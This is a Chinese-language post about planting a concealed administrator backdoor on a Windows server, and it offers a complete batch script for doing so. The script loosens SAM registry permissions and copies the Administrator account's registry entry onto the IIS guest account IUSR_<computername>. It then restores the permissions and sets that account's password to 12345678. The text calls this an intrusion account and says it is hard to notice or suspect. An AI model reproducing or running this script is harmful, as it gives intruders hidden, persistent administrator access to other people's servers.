網(wǎng)上看了很多復(fù)制administator權(quán)限帳號的方法或者工具, 比如建立admin$, 所謂的隱藏帳號, 并復(fù)制administrator的權(quán)限。 其實這是暫時、一次性隱藏而已, 服務(wù)器重啟一下通過“計算機(jī)管理”或者net user都能看到的。
本批處理根據(jù)服務(wù)器的情況, 結(jié)合自己的研究, 使用服務(wù)器本地iis帳號IUSR_計算機(jī)名, 設(shè)置密碼位12345678(可以自己改一下批處理最后一行)。 這個來復(fù)制administrator權(quán)限, 難以發(fā)現(xiàn)與引起懷疑。
(當(dāng)然其他帳號也可以, 用這個帳號主要通過機(jī)器名就能知道自己想要的入侵帳號密碼是多少)
程序代碼
echo off
setlocal enabledelayedexpansion
echo %computername%
echo HKEY_LOCAL_MACHINE\SAM\SAM [1 17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IUSR_%computername%
rem unicode ->ascii
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem find IUSR_%computername% 的對應(yīng)id
for /F "delims=( tokens=1-5* skip=3" %%a in (%windir%\..\2.reg) do set iusr_id=%%b
del /q "%windir%\..\2.reg"
rem export administrator register
regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem replace 1fx->iusr_id
for /f "tokens=* delims=:" %%i in (%windir%\..\2.reg) do (
for /f "tokens=*" %%j in ("%%i") do (
set TMP=%%j
set "TMP=!TMP:000001F4=00000%iusr_id:~0,3%!"
echo !TMP!>>%windir%\..\1.reg
)
)
regedit /s %windir%\..\1.reg
del /q %windir%\..\1.reg
del /q %windir%\..\2.reg
echo HKEY_LOCAL_MACHINE\SAM\SAM [17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
del /q "%windir%\..\1.reg"
net user IUSR_%computername% 12345678